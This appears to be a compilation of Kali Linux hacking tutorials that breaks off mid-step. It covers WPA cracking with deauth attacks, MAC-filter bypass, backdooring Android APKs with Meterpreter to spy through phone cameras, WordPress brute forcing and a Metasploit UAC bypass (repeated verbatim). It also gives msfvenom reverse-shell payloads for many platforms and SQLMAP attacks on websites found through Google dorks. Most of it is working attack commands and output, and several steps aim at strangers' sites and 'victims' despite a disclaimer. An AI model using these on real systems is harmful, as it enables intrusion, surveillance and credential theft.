How To Hack WPA/WPA2 Wi-Fi With Kali Linux & Aircrack-ng 2016

 Kali Linux can be used for many things, but it probably is best known for its ability to penetration test, or “hack,” WPA and WPA2 networks. There are hundreds of Windows applications that claim they can hack WPA; don’t get them! They’re just scams, used by professional hackers, to lure newbie or wannabe hackers into getting hacked themselves. There is only one way that hackers get into your network, and that is with a Linux-based OS, a wireless card capable of monitor mode, and aircrack-ng or similar. Also note that, even with these tools, Wi-Fi cracking is not for beginners. Playing with it requires basic knowledge of how WPA authentication works, and moderate familiarity with Kali Linux and its tools. If you feel you have the necessary skills, let’s begin:

These are things that you’ll need:

• A successful install of Kali Linux (which you probably have already done)
• A wireless adapter capable of injection/monitor mode. Some computers have network cards capable of this from the factory. If you’re, like most however, you’ll have to buy an external one. Here is a list of the best: http://blackmoreops.com/recommended-usb-wireless-cards-kali-linux
• A wordlist to attempt to “crack” the password once it has been captured
• Time and patients

If you have these then roll up your sleeves and let’s see how secure your network is!

          Important notice: Hacking into anyone’s Wi-Fi without permission is considered an illegal act or crime in most countries. We are performing this tutorial for the sake of penetration testing, hacking to become more secure, and are using our own test network and router.

By reading and/or using the information below, you are agreeing to our Disclaimer

Step One:

Start Kali Linux and login, preferably as root.

Step Two:

Plugin your injection-capable wireless adapter, (Unless your native computer wireless card supports it). If you’re using Kali in VMware, then you might have to connect the card via the imageicon in the device menu.

Step Three:

Disconnect from all wireless networks, open a Terminal, and type airmon-ng

This will list all of the wireless cards that support monitor (not injection) mode. If no cards are listed, try disconnecting and reconnecting the adapter (if you’re using one) and check that it supports monitor mode. If you’re not using an external adapter, and you still don’t see anything listed, then your card doesn’t support monitor mode, and you’ll have to purchase an external one (see the link in therequirements). You can see here that my card supports monitor mode and that it’s listed as wlan0.
Step Four:
Type airmon-ng start followed by the interface name of your wireless card. mine is wlan0, so my command would be: airmon-ng start wlan0

The “(monitor mode enabled)” message means that the card has successfully been put into monitor mode. Note the name of the new monitor interface, mon0.

EDIT:

A bug recently discovered in Kali Linux makes airmon-ng set the channel as a fixed “-1” when you first enable mon0. If you receive this error, or simply do not want to take the chance, follow these steps after enabling mon0:

Type: ifconfig [interface of wireless card] down and hit Enter.

Replace [interface of wireless card] with the name of the interface that you enabled mon0 on; probably called wlan0. This disables the wireless card from connecting to the internet, allowing it to focus on monitor mode instead. 

After you have disabled mon0 (completed the wireless section of the tutorial), you’ll need to enable wlan0 (or name of wireless interface), by typing: ifconfig [interface of wireless card] up and pressing Enter.

Step Five:

Type airodump-ng followed by the name of the new monitor interface, which is probably mon0

If you receive a “fixed channel –1” error, see the Edit above.

Step Six:

Airodump will now list all of the wireless networks in your area, and a lot of useful information about them. Locate your network or the network that you have permission to penetration test. Once you’ve spotted your network on the ever-populating list, hit Ctrl + C on your keyboard to stop the process. Note the channel of your target network.

Step Seven:

Copy the BSSID of the target network

Now type this command: 

airodump-ng -c [channel] --bssid [bssid] -w /root/Desktop/ [monitor interface]Replace [channel] with the channel of your target network. Paste the network BSSID where [bssid] is, and replace [monitor interface] with the name of your monitor-enabled interface, (mon0). The “–w” and file path command specifies a place where airodump will save any intercepted 4-way handshakes (necessary to crack the password). Here we saved it to the Desktop, but you can save it anywhere.

A complete command should look similar this: 

airodump-ng -c 10 --bssid 00:14:BF:E0:E8:D5 -w /root/Desktop/ mon0

Now press enter.

Step Eight:

Airodump with now monitor only the target network, allowing us to capture more specific information about it. What we’re really doing now is waiting for a device to connect or reconnect to the network, forcing the router to send out the four-way handshake that we need to capture in order to crack the password.

Also, four files should show up on your desktop, this is where the handshake will be saved when captured, so don’t delete them!

But we’re not really going to wait for a device to connect, no, that’s not what impatient hackers do. We’re actually going to use another cool-tool that belongs to the aircrack suite called aireplay-ng, to speed up the process. Instead of waiting for a device to connect, hackers can use this tool to force a device to reconnect by sending deauthentication (deauth) packets to one of the networks devices, making it think that it has to reconnect with the network.

Of course, in order for this tool to work, there has to be someone else connected to the network first, so watch the airodump-ng and wait for a client to show up. It might take a long time, or it might only take a second before the first one shows. If none show up after a lengthy wait, then the network might be empty right now, or you’re to far away from the network.

You can see in this picture, that a client has appeared on our network, allowing us to start the next step.

Step Nine:

Leave airodump-ng running and open a second terminal. In this terminal, type this command:

aireplay-ng –0 2 –a [router bssid] –c [client bssid] mon0The –0 is a short cut for the deauth mode and the 2 is the number of deauth packets to send.

-a indicates the access point/router’s BSSID, replace [router bssid] with the BSSID of the target network, which in my case, is 00:14:BF:E0:E8:D5.

-c indicates the client’s BSSID, the device we’re trying to deauth, noted in the previous picture. Replace the [client bssid] with the BSSID of the connected client, this will be listed under “STATION.”

And of course, mon0 merely means the monitor interface, change it if yours is different.

My complete command looks like this:

aireplay-ng –0 2 –a 00:14:BF:E0:E8:D5 –c 4C:EB:42:59:DE:31 mon0

Step Ten:

Upon hitting Enter, you’ll see aireplay-ng send the packets. If you were close enough to the target client, and the deauthentication process works, this message will appear on the airodump screen (which you left open):

This means that the handshake has been captured, the password is in the hacker’s hands, in some form or another. You can close the aireplay-ng terminal and hit Ctrl + C on the airodump-ng terminal to stop monitoring the network, but don’t close it yet just incase you need some of the information later.

If you didn’t receive the “handshake message,” then something went wrong in the process of sending the packets. Unfortunately, a variety of things can go wrong. You might just be too far away, and all you need to do is move closer. The device you’re attempting to deauth might not be set to automatically reconnect, in which case you’ll either have to try another device, or leave airodump on indefinitely until someone or something connects to the network. If you’re very close to the network, you could try a WiFi spoofing tool like wifi-honey, to try to fool the device into thinking that you’re the router. However, keep in mind that this requires that you be significantly closer to the device than the router itself. So unless you happen to be in your victim’s house, this is not recommended.

Do note that, despite your best efforts, there are many WPA networks that simply can’t be cracked by these tools. The network could be empty, or the password could be 64 characters long, etc.

Step 11:

This concludes the external part of this tutorial. From now on, the process is entirely between your computer, and those four files on your Desktop. Actually, it’s the .cap one, that is important. Open a new Terminal, and type in this command:

aircrack-ng -a2 -b [router bssid] -w [path to wordlist] /root/Desktop/*.cap

-a is the method aircrack will use to crack the handshake, 2=WPA method.

-b stands for bssid, replace [router bssid] with the BSSID of the target router, mine is 00:14:BF:E0:E8:D5.

-w stands for wordlist, replace [path to wordlist] with the path to a wordlist that you have downloaded. I have a wordlist called “wpa.txt” in the root folder.

/root/Desktop/*.cap is the path to the .cap file containing the password. The * means wild card in Linux, and since I’m assuming that there are no other .cap files on your Desktop, this should work fine the way it is.

My complete command looks like this:

aircrack-ng –a2 –b 00:14:BF:E0:E8:D5 –w /root/wpa.txt  /root/Desktop/*.cap

Now press Enter.

Step 12:

Aircrack-ng will now launch into the process of cracking the password. However, it will only crack it if the password happens to be in the wordlist that you’ve selected. Sometimes, it’s not. If this is the case, you can try other wordlists. If you simply cannot find the password no matter how many wordlists you try, then it appears your penetration test has failed, and the network is at least safe from basic brute-force attacks.

Cracking the password might take a long time depending on the size of the wordlist. Mine went very quickly.

If the phrase is in the wordlist, then aircrack-ng will show it too you like this:

The passphrase to our test-network was “notsecure,” and you can see here that it was in the wordlist, and aircrack found it.

If you find the password without a decent struggle, then change your password, if it’s your network. If you’re penetration testing for someone, then tell them to change their password as soon as possible.

Bypass MAC filtering on wireless networks

In this tutorial we will be looking at how to bypass MAC filtering on a wireless network. MAC filtering, or MAC white- or blacklisting, is often used as a security measure to prevent non whitelisted MAC addresses from connecting to the wireless network. MAC Address stands for media access control address and is a unique identifier assigned to your network interface. With MAC filtering you can specify MAC addresses which are allowed or not allowed to connect to the network. For many occasions this might be sufficient as a security measure which makes it a little harder to use the network when the password is known. As a security measure to protect company networks and data or to prevent networks from being hacked over WiFi, MAC filtering is pretty useless and easy to bypass which we’re about to show you in this hacking tutorial.

In this tutorial we will be bypass MAC filtering on a TP link WR-841N router by spoofing the MAC address of a connected client. The connected client’s MAC address is whitelisted, otherwise it would not have been able to connect to the wireless network. We will put our wifi adapter in monitoring mode and retrieve the MAC address of connected clients with Airodump-NG on Kali Linux. Then we will be using the Macchanger tool to spoof our MAC address, bypass MAC filtering and connect to the wireless network. Hacking the WiFi network password is outside the scope of this tutorial. You can have a look at the following WiFi hacking tutorials and tools to learn how to retrieve the password (and prevent this from happening):

MAC filtering settings

First we will be configuring the MAC filtering functionality in the router settings. We will be adding one client to the whitelist which will be our connected client:

Let’s try to connect from another client in Kali Linux 2.0:

Even if we use the right password is does not allow us to connect to the wireless network. We end up in an endless loop without authentication. This tells us the MAC filtering is active and working like a charm.

Bypass MAC Filtering

First we will have to put our WiFi adapter in monitoring mode using Airmon-ng and kill all the processes Kali Linux is complaining about:

airmon-ng start wlan0

kill [pid]

Then we launch Airodump-ng to locate the wireless network and the connected client(s) using the following command:

airodump-ng –c [channel]–bssid [target router MAC Address]–i wlan0mon

Airodump-ng now shows us a list of all connected clients at the bottom of the terminal. The second column lists the MAC Addresses of the connected client which we will be spoofing in order to authenticate with the wireless network.

Spoofing the MAC Address with Macchanger

Now that we know a MAC address that is whitelisted in the TP Link router settings we can use it to spoof our own MAC address in order to authenticate with the network. Let’s spoof the MAC address of your wireless adapter but first we take need to take down the monitoring interface wlan0mon and the wlan0 interface in order to change the MAC address. We can do this by using the following command:

Airmon-ng stop wlan0mon

Now we take down the wireless interface who’s MAC address we want to spoof with the following command:

ifconfig wlan0 down

Now we can use Macchanger to change the MAC address:

macchanger -m [New MAC Address] wlan0

And bring it up again:

ifconfig wlan0 up

Now that we have changed the MAC address of our wireless adapter to a whitelisted MAC address in the router we can try to authenticate with the network and see if we’re able to connect:

As you can see we have managed to connect to the wireless network using a spoofed MAC address of a connected client. This tutorial shows us that it was extremely easy to bypass MAC filtering on a wireless network and that MAC filtering in general is useless to protect your network from hackers.

Backdoor APK - Hack Any Android Phones

backdoor-apk is a shell script that simplifies the process of adding a backdoor to any Android APK file. Users of this shell script should have working knowledge of Linux, Bash, Metasploit, Apktool, the Android SDK, smali, etc. This shell script is provided as-is without warranty of any kind and is intended for educational purposes only


Usage:

root@kali:~/Android/evol-lab/BaiduBrowserRat# ./backdoor-apk.sh BaiduBrowser.apk
          ________
         / ______ \
         || _  _ ||
         ||| || |||          AAAAAA   PPPPPPP   KKK  KKK
         |||_||_|||         AAA  AAA  PPP  PPP  KKK KKK
         || _  _o|| (o)     AAA  AAA  PPP  PPP  KKKKKK
         ||| || |||         AAAAAAAA  PPPPPPPP  KKK KKK
         |||_||_|||         AAA  AAA  PPP       KKK  KKK
         ||______||         AAA  AAA  PPP       KKK  KKK
        /__________\
________|__________|__________________________________________
       /____________\
       |____________|            Dana James Traversie

[*] Running backdoor-apk.sh v0.1.7 on Wed Nov 30 22:30:34 EST 2016
[+] Android payload options:
1) meterpreter/reverse_http   4) shell/reverse_http
2) meterpreter/reverse_https  5) shell/reverse_https
3) meterpreter/reverse_tcp    6) shell/reverse_tcp
[?] Please select an Android payload option: 2
[?] Please enter an LHOST value: 10.6.9.31
[?] Please enter an LPORT value: 443
[+] Handle the payload via resource script: msfconsole -r backdoor-apk.rc
[*] Generating RAT APK file...done.
[*] Decompiling RAT APK file...done.
[*] Decompiling original APK file...done.
[*] Merging permissions of original and payload projects...done.
[*] Running proguard on RAT APK file...done.
[*] Decompiling obfuscated RAT APK file...done.
[*] Creating new directories in original project for RAT smali files...done.
[*] Copying RAT smali files to new directories in original project...done.
[*] Fixing RAT smali files...done.
[*] Obfuscating const-string values in RAT smali files...done.
[*] Locating smali file to hook in original project...done.
[*] Adding hook in original smali file...done.
[*] Adding persistence hook in original project...done.
[*] Recompiling original project with backdoor...done.
[*] Generating RSA key for signing...done.
[*] Signing recompiled APK...done.
[*] Verifying signed artifacts...done.
[*] Aligning recompiled APK...done.
root@kali:~/Android/evol-lab/BaiduBrowserRat#

The recompiled APK will be found in the 'original/dist' directory. Install the APK on a compatible Android device, run it, and handle the meterpreter connection via the generated resource script: msfconsole -r backdoor-apk.rc

--------------

Link: https://github.com/dana-at-cp/backdoor-apk

Wordpress Admin username's Password Brute Force Attack

Open terminal in kali linux and type 'wpscan --url http://site.com/ --enumerate u' and hit enter now wait few minutes you will get the users of website now you need the wordlist 'I don't have any wordlist so make your own, i will share the link of wordlist in comments when i make my own wordlist or find the wordlist', save on the desktop wordlist you have created or downloaded and save it as 'wordlist'. Now type 'wpscan --url http://site.com/ --wordlist '/path/wordlist.txt --username USERNAME HERE' (For this step you can drop and drag the wordlist on terminal) and hit enter then wait few minutes for BRUTE FORCE to check the passwords, You will get the password of admin user. 'IF YOUR LUCK IS WITH YOU'

Commands -
root@kali:~# wpscan --url http://site.com/ --enumerate u
root@kali:~# wpscan --url http://site.com/ --wordlist '/path of wordlist/wordlist.txt' --username USERNAME

Note - This will work when the admin user's password is in your wordlist. And sometimes terminal will ask you for 'redirection' simply type 'Y' and hit enter.
PM me if you face any problem while brute forcing the password

[Kali Tut] - How to run google chrome on Kali Linux 2.0 with root

Hi guys!

With Kali Linux 2.0, Google Chrome not start with root Acount.
Today, i will post for you , how to start google chrome on Kali Linux 2.0 with root

1. Run Google Chrome with root on terminal

• #cd /opt/google/chrome#
• #nano google-chrome 
• add line: --user-data-dir

• Save fiel edit
• Open terminal and execute command line #google-chrome --no-sandbox

1. Run Google Chrome with root on shortcut

• #cd /opt/google/chrome#

• #nano google-chrome
• add line: --user-data-dir --no-sandbox
• save file edit
• execute google chrome on desktop

Done!

Good luck!

Facebook: https://facebook.com/pentester72

Youtube: https://www.youtube.com/channel/UCwLM5caRRGycxqxkVjDz0lg

Bypass UAC and get admin privilege in windows 7 using metasploit

Sometimes when you trying to exploit a security hole and success gain an access to the target system, usually you only act as logged user and it’s not a local system account. In this tips and trick there’s a simple step to escalate your privilege when you’re inside meterpreter.

This picture below taken when hacked successfully gain an access using  Payload create by me.

#meterpreter  >  getuid

When running getuid command, we know that we running as user that already logged in to the system but we didn’t act as system account. How do we do that to escalate our privilege to system account?.

The session only has limited user rights. This can severely limit actions you can perform on the remote system such as dumping passwords, manipulating the registry, installing backdoors, etc.

Fortunately, Metasploit has a Meterpreter script, ‘getsystem’, that will use a number of different techniques to attempt to gain SYSTEM level privileges on the remote system. There are also various other (local) exploits that can be used to also escalate   privileges.

#meterpreter  >  use priv

#meterpreter  >   getsystem

make use of the ‘getsystem’ command, if its not already loaded we will need to first load the ‘priv’ extension.

We will let Metasploit try to do the heavy lifting for us by running “getsystem” without any options. The script will attempt every method available to it, stopping when it succeeds.

There are situations where getsystem fails depending upon the operating system and exploiting method  we are using.

n this above image we are only getting access to normal system user  acount  with less privileges, by executing    post/windows/gather/win_privs command it will list the privilege of the current users logged in.

For this tutorial we are exploiting windows 7 as a victim’s machine and by executing a sysinfo command in your meterpeter shell you will get informations about your exploiting system.

#meterpreter  >   sysinfo

#meterpreter  >     run  post/windows/gather/win_privs

If   the  getsystem  code detects that it is running on a Windows 7 with UAC disabled and it is running as local admin it will run getsystem and it will use the read registry method.

When we executing  getsystem  command  it will fail because the  current logged user have not enough privilege to get admin roles and particularly in windows 7 UAC is defaulty enabled.

So we first try to bypass UAC enabled in windows  7, Luckily we have windows UAC bypass exploit in metasploit.

Meterpreter on Kali no longer recognized “run bypassuac” instead  we had to use exploit/windows/local/bypassuac.

BypassUAC   exploit  that allows you to bypass Windows UAC in Windows Vista and Windows 7 both on x86 and x64 operating systems. This issue has still not been patched to-date and can still be exploited on the most recent operating systems.

For that  we need to background the session, and manually  try bypassuac exploit and load the session recently backgrounded and then exploit and execute  getsystem to get admin privilege.

#meterpreter  > background

#meterpreter  >   search uac

#meterpreter  >   use exploit/windows/local/bypassuac

I exploited this machine with the payload i created before,  so try the  method you used  for exploiting the machine before.

#meterpreter  >   set payload windows/meterpreter/reverse_tcp

#meterpreter  > set   LHOST 192.168.31.20

#meterpreter  > set   LPORT  8080

#meterpreter  >   set   SESSION 1

#meterpreter  >    exploit

After getting acess try getsystem command.

#meterpreter  >  getsystem

Done!

Bypass UAC and get admin privilege in windows 7 using metasploit

Sometimes when you trying to exploit a security hole and success gain an access to the target system, usually you only act as logged user and it’s not a local system account. In this tips and trick there’s a simple step to escalate your privilege when you’re inside meterpreter.

This picture below taken when hacked successfully gain an access using  Payload create by me.

#meterpreter  >  getuid

When running getuid command, we know that we running as user that already logged in to the system but we didn’t act as system account. How do we do that to escalate our privilege to system account?.

The session only has limited user rights. This can severely limit actions you can perform on the remote system such as dumping passwords, manipulating the registry, installing backdoors, etc.

Fortunately, Metasploit has a Meterpreter script, ‘getsystem’, that will use a number of different techniques to attempt to gain SYSTEM level privileges on the remote system. There are also various other (local) exploits that can be used to also escalate   privileges.

#meterpreter  >  use priv

#meterpreter  >   getsystem

make use of the ‘getsystem’ command, if its not already loaded we will need to first load the ‘priv’ extension.

We will let Metasploit try to do the heavy lifting for us by running “getsystem” without any options. The script will attempt every method available to it, stopping when it succeeds.

There are situations where getsystem fails depending upon the operating system and exploiting method  we are using.

n this above image we are only getting access to normal system user  acount  with less privileges, by executing    post/windows/gather/win_privs command it will list the privilege of the current users logged in.

For this tutorial we are exploiting windows 7 as a victim’s machine and by executing a sysinfo command in your meterpeter shell you will get informations about your exploiting system.

#meterpreter  >   sysinfo

#meterpreter  >     run  post/windows/gather/win_privs

If   the  getsystem  code detects that it is running on a Windows 7 with UAC disabled and it is running as local admin it will run getsystem and it will use the read registry method.

When we executing  getsystem  command  it will fail because the  current logged user have not enough privilege to get admin roles and particularly in windows 7 UAC is defaulty enabled.

So we first try to bypass UAC enabled in windows  7, Luckily we have windows UAC bypass exploit in metasploit.

Meterpreter on Kali no longer recognized “run bypassuac” instead  we had to use exploit/windows/local/bypassuac.

BypassUAC   exploit  that allows you to bypass Windows UAC in Windows Vista and Windows 7 both on x86 and x64 operating systems. This issue has still not been patched to-date and can still be exploited on the most recent operating systems.

For that  we need to background the session, and manually  try bypassuac exploit and load the session recently backgrounded and then exploit and execute  getsystem to get admin privilege.

#meterpreter  > background

#meterpreter  >   search uac

#meterpreter  >   use exploit/windows/local/bypassuac

I exploited this machine with the payload i created before,  so try the  method you used  for exploiting the machine before.

#meterpreter  >   set payload windows/meterpreter/reverse_tcp

#meterpreter  > set   LHOST 192.168.31.20

#meterpreter  > set   LPORT  8080

#meterpreter  >   set   SESSION 1

#meterpreter  >    exploit

After getting acess try getsystem command.

#meterpreter  >  getsystem

Done!

Kali Tut - [ How to receive shell from Windows 7,8,10 with setoolkit (So...

Creating Metasploit Payloads on Kali Linux 2.0 Rolling

Often one of the most useful (and to the beginner underrated) abilities of Metasploit is the msfpayload module. Multiple payloads can be created with this module and it helps something that can give you a shell in almost any situation. For each of these payloads you can go into msfconsole and select exploit/multi/handler. Run ‘set payload’ for the relevant payload used and configure all necessary options (LHOST, LPORT, etc). Execute and wait for the payload to be run. For the examples below it’s pretty self explanatory but LHOST should be filled in with your IP address (LAN IP if attacking within the network, WAN IP if attacking across the internet), and LPORT should be the port you wish to be connected back on.

List Payloads

msfvenom -l

Binaries
Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf

Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho

Web Payloads




msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your 

Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php



ASP

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your 

Port to Connect On> -f asp > shell.asp



JSP

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your 

Port to Connect On> -f raw > shell.jsp




WAR

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your 

Port to Connect On> -f war > shell.war



Scripting Payloads



Python

msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your 

Port to Connect On> -f raw > shell.py





Bash

msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your 

Port to Connect On> -f raw > shell.sh



Perl

msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your 

Port to Connect On> -f raw > shell.pl



Shellcode




For all shellcode see ‘msfvenom –help-formats’ for information as to valid 

parameters. Msfvenom will output code that is able to be cut and pasted in 

this language for your exploits.



Linux Based Shellcode



msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your 

Port to Connect On> -f <language>




Windows Based Shellcode



msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your 

Port to Connect On> -f <language>




Mac Based Shellcode



msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your 

Port to Connect On> -f <language>




Handlers








Metasploit handlers can be great at quickly setting up Metasploit to be in a 

position to receive your incoming shells. Handlers should be in the following 

format.



use exploit/multi/handler
set PAYLOAD <Payload name>
set LHOST <LHOST value>
set LPORT <LPORT value>
set ExitOnSession false
exploit -j -z



Once the required values are completed the following command will execute your 

handler – ‘msfconsole -L -r ‘

Breakthrough Android devices and control their own cameras

We talked in a previous video on how to get through the Android and control systems through to be APK file through Metasploit project and then get the powers to control the device in a simple, in this article I will explain how to penetrate the Android systems through Meterpreter APK payload are configured through Metasploit and then take some pictures through the camera front and rear of the device works with Android system.

We will begin the formation Meterpreter android payload through Metasploit, looking at the following image:

We also note we configure Android Meterpreter payload, doing a reverse connection to the ip particularly my computer address and port 1234, please review cycle Penetration Testing with Metasploit free to be able to understand this article better, now let 's do the processing of receiving the call through Metasploit through Multi handler :

Fabulous ! , We eavesdrop on port 1234 through the Multi handler, can now receive the next contact through our Albailoud, now there will be many scenarios that we will work with them to deliver pay.apk that was previously generated to an Android device that will be breached file, I will ask a range of scenarios, namely:

• Dns Spoof work and transform the user page has pre-programmed to persuade him to download pay.apk file.
• Send pay.apk file directly to the user.
• Forgery of some of the things inside the Google play and download pay.apk through it.

I know that the latter scenario could be very fun and very strong but I'll choose the second scenario in the beginning to clarify the mechanism of action and will leave Google play scenario of strong new of its kind in this area to explain, and as for the first scenario will touch him later also

We will now send pay.apk file to the user through Bluetooth, and the images of the Android system describes how to receive and run the file:

Well, as we observe the inauguration pay.apk on your Android device and we will now turn it on and complete our own process, these pictures show the completion of the installation of pay.apk

We also note was inaugurated pay.apk He now works under the name Main activity we will turn it on now and will observe the work of Reverse contact with us, and these pictures show that:

Very nice, because now we are trying to help execute the command to view some of the available commands and will observe their last command line, you have the following picture:

As Seen There webcam_list and webcam_snap option, we will now bring existing cameras inside the machine through our implementation of the order webcam_list:

Good ! We also note there are two cameras inside the machine to Anagam now implementing it webcam_snap and then determine the camera number that we want to take a picture of them and this will be the result of executing the command:

This is the image captured by the front camera own my computer:

As we can see, we were able to take a picture of my computer for the camera of a breakthrough system through the APK metepreter and, God willing, there will be more powerful explanations that specializes in test penetration of smart phones.

Use SQLMAP SQL Injection to hack a website and database in Kali Linux

What is SQLMAP

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Features

1.     Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB database management systems.
2.     Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query, stacked queries and out-of-band.
3.     Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.
4.     Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.
5.     Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
6.     Support to dump database tables entirely, a range of entries or specific columns as per user’s choice. The user can also choose to dump only a range of characters from each column’s entry.
7.     Support to search for specific database names, specific tables across all databases or specific columns across all databases’ tables. This is useful, for instance, to identify tables containing custom application credentials where relevant columns’ names contain string like name and pass.
8.     Support to download and upload any file from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
9.     Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
10.     Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user’s choice.
11.     Support for database process’ user privilege escalation via Metasploit’s Meterpreter getsystem command.

Step 1: Find a Vulnerable Website

This is usually the toughest bit and takes longer than any other steps. Those who know how to use Google Dorks knows this already, but in case you don’t I have put together a number of strings that you can search in Google. Just copy paste any of the lines in Google and Google will show you a number of search results.

Step 1.a: Google Dorks strings to find Vulnerable SQLMAP SQL injectable website

This list a really long.. Took me a long time to collect them. If you know SQL, then you can add more here.. Put them in comment section and I will add them here.

Step 1.b: Initial check to confirm if website is vulnerable to SQLMAP SQL Injection

For every string show above, you will get huundreds of search results. How do you know which is really vulnerable to SQLMAP SQL Injection. There’s multiple ways and I am sure people would argue which one is best but to me the following is the simplest and most conclusive.

Let’s say you searched using this string inurl:item_id= and one of the search result shows a website like this:

http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15

Just add a single quotation mark ' at the end of the URL. (Just to ensure, "

 is a double quotation mark and ' is a single quotation mark).

So now your URL will become like this:

http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15'

If the page returns an SQL error, the page is vulnerable to SQLMAP 
SQL Injection. If it loads or redirect you to a different page, move on 
to the next site in your Google search results page.


See example error below in the screenshot. I’ve obscured everything including 

URL and page design for obvious reasons.







Examples of SQLi Errors from Different Databases and Languages
Microsoft SQL Server

Server Error in ‘/’ Application. Unclosed quotation mark before the character

 string ‘attack;’.

Description: An unhanded exception occurred during the execution of the current

 web request. Please review the stack trace for more information about the error

 where it originated in the code.



Exception Details: System.Data.SqlClient.SqlException: Unclosed quotation mark

 before the character string ‘attack;’.



MySQL Errors

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result 

resource in /var/www/myawesomestore.com/buystuff.php on line 12

Error: You have an error in your SQL syntax: check the manual that corresponds 

to your MySQL server version for the right syntax to use near ‘’’ at line 12



Oracle Errors

java.sql.SQLException: ORA-00933: SQL command not properly ended at 

oracle.jdbc.dbaaccess.DBError.throwSqlException(DBError.java:180) at 

oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:208)

Error: SQLExceptionjava.sql.SQLException: ORA-01756: quoted string not properly 

terminated



PostgreSQL Errors

Query failed: ERROR: unterminated quoted string at or near “‘’’”



Step 2: List DBMS databases using SQLMAP SQL Injection

As you can see from the screenshot above, I’ve found a SQLMAP SQL Injection 

vulnerable website. Now I need to list all the databases in that Vulnerable

 database. (this is also called enumerating number of columns). As I am using 

SQLMAP, it will also tell me which one is vulnerable.

Run the following command on your vulnerable website with.



sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 --dbs


In here:
sqlmap = Name of sqlmap binary file
-u = Target URL (e.g. “http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15”)
--dbs = Enumerate DBMS databases

See screenshot below.



This commands reveals quite a few interesting info:

web application technology: Apache
back-end DBMS: MySQL 5.0
[10:55:53] [INFO] retrieved: information_schema
[10:55:56] [INFO] retrieved: sqldummywebsite
[10:55:56] [INFO] fetched data logged to text files
 under '/usr/share/sqlmap/output/www.sqldummywebsite.com'

So, we now have two database that we can look into. information_schema is 
a standard database for almost every MYSQL database. So our interest would be 
on sqldummywebsite database.

Step 3: List tables of target database using SQLMAP SQL Injection

Now we need to know how many tables this sqldummywebsite database got and what
 are their names. To find out that information, use the following command:

sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite --tables

Sweet, this database got 8 tables.

[10:56:20] [INFO] fetching tables for database: 'sqldummywebsite'
[10:56:22] [INFO] heuristics detected web page charset 'ISO-8859-2'
[10:56:22] [INFO] the SQL query used returns 8 entries
[10:56:25] [INFO] retrieved: item
[10:56:27] [INFO] retrieved: link
[10:56:30] [INFO] retrieved: other
[10:56:32] [INFO] retrieved: picture
[10:56:34] [INFO] retrieved: picture_tag
[10:56:37] [INFO] retrieved: popular_picture
[10:56:39] [INFO] retrieved: popular_tag
[10:56:42] [INFO] retrieved: user_info




and of course we want to check whats inside user_info table using SQLMAP SQL 
Injection as that table probably contains username and passwords.

Step 4: List columns on target table of selected database using SQLMAP SQL
 Injection

Now we need to list all the columns on target table user_info of sqldummywebsite
 database using SQLMAP SQL Injection. SQLMAP SQL Injection makes it really easy,
 run the following command:


sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info --columns



This returns 5 entries from target table user_info of sqldummywebsite database.

[10:57:16] [INFO] fetching columns for table 'user_info' in database 'sqldummywebsite'
[10:57:18] [INFO] heuristics detected web page charset 'ISO-8859-2'
[10:57:18] [INFO] the SQL query used returns 5 entries
[10:57:20] [INFO] retrieved: user_id
[10:57:22] [INFO] retrieved: int(10) unsigned
[10:57:25] [INFO] retrieved: user_login
[10:57:27] [INFO] retrieved: varchar(45)
[10:57:32] [INFO] retrieved: user_password
[10:57:34] [INFO] retrieved: varchar(255)
[10:57:37] [INFO] retrieved: unique_id
[10:57:39] [INFO] retrieved: varchar(255)
[10:57:41] [INFO] retrieved: record_status
[10:57:43] [INFO] retrieved: tinyint(4)

AHA! This is exactly what we are looking for … target table user_login and 
user_password .




Step 5: List usernames from target columns of target table of selected
 database using SQLMAP SQL Injection

SQLMAP SQL Injection makes is Easy! Just run the following command again:


